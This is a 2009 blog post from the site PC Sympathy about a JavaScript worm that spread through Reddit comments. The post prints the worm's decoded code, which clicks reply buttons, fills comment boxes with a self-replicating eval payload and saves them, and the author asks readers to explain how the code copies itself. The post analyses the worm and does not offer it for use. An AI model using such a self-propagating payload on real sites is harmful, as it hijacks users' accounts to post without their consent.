Reddit Javascript Worm?

September 27, 2009 – 10:13 PM

Well, all that URL-encoded text in the links evaluates to something functionally equivalent to this:

nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

    elements = document.getElementsByTagName('a');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML == 'reply') {
            $(elements[i]).click();
        }
    }

    elements = document.getElementsByTagName('textarea');

    for (i = 0; i < elements.length; i++)
        elements[i].value = nonsense;

    elements = document.getElementsByTagName('button');
    for (i = 0; i < elements.length; i++) {
        if (elements[i].innerHTML     == 'save'
        &&  elements[i].style.display != 'none') {
            $(elements[i]).click();
        }
    }

    ">x"

I’m not an expert so I can’t decipher what it’s doing up there with the nonsense bit. It looks like something akin to a quine. Any takers?

Update: sorry about the misleading title; I was under the mistaken impression that this was specific to Firefox. It appears to affect WebKit and Gecko browsers at least, but it didn’t hit me with Safari 4.

Source:
http://www.reddit.com/r/programming/comments/9oo8j/source_code_for_the_redditfirefox_exploit/

  1. One Response to “Reddit Javascript Worm?”

  2. It’s supposedly fixed already. Not a member to confirm.

    By manunkind on Sep 28, 2009

You must be logged in to post a comment.

Copyright 2008-2024 PC Sympathy - Entries (RSS) - Sitemap